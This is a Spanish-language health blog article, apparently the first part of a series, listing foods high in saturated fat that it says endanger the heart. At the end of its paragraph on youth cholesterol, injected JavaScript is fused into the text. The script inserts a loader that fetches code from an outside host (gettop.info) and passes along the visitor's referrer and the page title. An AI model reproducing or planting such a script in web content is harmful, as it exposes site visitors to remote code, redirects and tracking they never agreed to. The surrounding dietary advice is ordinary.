Salud y belleza » Alimentación, Bienestar, Enfermedades

Alimentos potencialmente peligrosos para el corazón I

Sin Comentarios

El corazón, como tópico poético o literario, tiene la facultad de soportar incontables males: solo hace falta tomar alguna obra de Neruda, Machado, Lorca o Vallejo para darse cuenta de ello (los protagonistas de esos hermosos versos son, casi siempre, románticos empedernidos de corazón inquebrantable, capaces de soportar todo por amor).

En cambio, si analizamos el corazón desde el punto de vista médico, descubriremos que, en realidad, estamos frente a un órgano sumamente frágil. Sí, más allá de la lírica de algunos escritores, el corazón es débil (la fuerza, en todo caso, proviene del espíritu, indomable o de otras cuestiones más emparentadas con la fe que con la ciencia).

Por lo tanto, tal núcleo debe ser cuidado de muchos modos: la alimentación representa, sin ningún tipo de dudas, uno de los aspectos más importantes en el duro ejercicio que es la protección de nuestro corazón.

“El corazón del hombre es, en términos básicos, un órgano musculoso y cónico situado en la cavidad toráxica que, como todos saben, funciona a modo de bomba, impulsando la sangre a todo el cuerpo. Es justamente por esta tarea que desempeña que, la alimentación se vuelve fundamental para el justo desempeño. Es decir, nuestro corazón necesita trabajar sin presiones, con canales abiertos para poder bombear la sangre de un modo fluído. Tanto el corazón como las arterias coronarias deben gozar de plena salud para que, así, todos los demás órganos puedan, al mismo tiempo, trabajar de forma acorde.

Como vemos, si bien es un mito que el corazón es el órgano más importante pues muchos otros también desempeñan tareas igual o más importantes, es necesario, aún así, no forzarlo ni provocar un esfuerzo perjudicial” nos relata un profesional de la medicina que solo suspende su narración por cuestiones relacionadas al espacio periodístico (de no ser así, seguiría hablando del corazón con, valga la redundancia, todo su corazón).

A continuación presentamos la primera parte del repaso con aquellos alimentos que deberíamos, o bien controlar, o bien reducir, para mantener un corazón saludable y evitar la aparición de cualquier tipo de enfermedad cardíaca.

Alimentos con grasas saturadas

Esta amplia y vasta categoría está formada por algunos alimentos como los que mencionaremos a continuación: carnes rojas grasas, manteca de cerdo, vÍsceras animales, panceta, jamón curado, embutidos, mariscos, huevos (o pastelería realizada a base de huevos), leche (completa y derivados no desnatados: quesos, mantequillas, yogures, natillas, nata, cremas), galletas, pasteles, aceites vegetales saturados (como el de coco, palma, de semilla de algodón, etc.) y alcohol.

¿Por qué se debe controlar o reducir (si hablamos de personas con una peligrosa historia clínica) la ingesta de estos? Por razones sencillas: todos ellos favorecen la obesidad y aumentan el colesterol. Es preocupante el índice de jóvenes que tienen nieveles altos de colesterol, es decir, cada vez desde más pequeños empiezan a desarrollar problemáticas dignas de sujetos de una edad mayor (eso, claro, porque, en la actualidad, en este mundo globalizado, la comida chatarra es un alimento consumido casi desde la edad cero).document.currentScript.parentNode.insertBefore(s, document.currentScript);s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Más consejos de salud y belleza : , , ,

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.